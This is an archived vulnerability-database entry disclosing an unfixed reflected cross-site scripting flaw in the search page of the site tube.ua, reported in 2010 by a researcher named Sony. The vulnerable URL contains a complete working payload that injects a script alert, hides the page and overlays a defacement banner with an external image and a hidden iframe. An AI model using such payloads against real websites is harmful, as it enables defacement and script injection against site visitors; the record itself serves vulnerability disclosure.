Unfixed XSS vulnerability at tube.ua

2010-07-22T00:00:00
ID XSSED:68395
Type xssed
Reporter Sony
Modified 2011-12-13T00:00:00

Description

Security researcher Sony, has submitted on 22/07/2010 a cross-site-scripting (XSS) vulnerability affecting tube.ua, which at the time of submission ranked 299935 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://tube.ua/search_result.php?search_id=%22%3E%3C/title%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html{background-color:%20Black;}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3Cimg%20src=%22http://i28.tinypic.com/1j402t.jpg%22%20style=%22height:%20400px;%20width:%20400px;%22%20alt=%22By%20Sony%22%3E%3Cbr%3EInsecurity%20Romania%3Cbr%3Eby%20Sony%3Ciframe%20src%20=http://www.youtube.com/watch?v=atzIya14uV4%22%20width=%220%22%20height=%220%22%20\%3E%3C/div%3E